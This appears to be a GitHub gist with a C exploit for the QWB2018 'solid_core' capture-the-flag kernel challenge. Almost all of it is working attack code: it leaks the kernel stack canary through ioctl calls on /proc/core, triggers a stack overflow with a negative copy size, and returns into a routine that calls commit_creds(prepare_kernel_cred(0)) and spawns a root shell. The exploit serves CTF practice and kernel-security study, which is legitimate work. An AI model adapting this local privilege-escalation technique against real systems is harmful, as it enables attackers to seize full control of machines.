Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exp.c

Created Dec 16, 2018
Embed
What would you like to do?
QWB2018 solid_core
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
struct cred;
struct task_struct;
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;
int fd;
long user_stack;
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
static void save_state() {
__asm__("mov %0, cs\n"
"mov %1, ss\n"
"pushfq\n"
"popq %2\n"
:"=r"(user_cs),"=r"(user_ss),"=r"(user_rflags)
:
:"memory"
);
}
void launch_shell(void) {
system("/bin/sh");
}
void get_root(void) {
commit_creds(prepare_kernel_cred(0));
__asm__("swapgs\n"
"mov rax, %0\n"
"push rax\n"
"mov rax, %1\n"
"push rax\n"
"mov rax, %2\n"
"push rax\n"
"mov rax, %3\n"
"push rax\n"
"mov rax, %4\n"
"push rax\n"
"iretq\n"
:
:"r"(user_ss),"r"(user_stack),"r"(user_rflags),"r"(user_cs),"r"(launch_shell)
:"memory"
);
}
// from https://www.exploit-db.com/exploits/44303
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret = 0;
f = fopen("/tmp/kallsyms", "r");
if (f == NULL) {
printf("[-] Failed to open /tmp/kallsyms\n");
exit(-1);
}
printf("[+] Find %s...\n", name);
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
printf("[+] Found %s at %lx\n", name, addr);
return addr;
}
}
fclose(f);
return 0;
}
void core_copy(long size) {
ioctl(fd, 0x6677889A, size);
}
void core_read(char* buf) {
ioctl(fd, 0x6677889B, buf);
}
void set_off(unsigned long off) {
ioctl(fd, 0x6677889C, off);
}
int main(void) {
unsigned long buf[0x800/8];
user_stack = buf;
save_state();
prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
puts("open /proc/core");
fd = open("/proc/core", O_RDWR);
if (fd < 0)
exit(1);
puts("leak kernel canary");
memset(buf, 0, 0x800);
set_off(0x40);
core_read(buf);
unsigned long canary = buf[0];
printf("canary = %lx\n", canary);
puts("cause stack bof");
buf[0x40/8] = canary;
buf[0x48/8] = user_stack;
buf[0x50/8] = get_root;
write(fd, buf, 0x200);
core_copy(0xffffffffffff0080);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.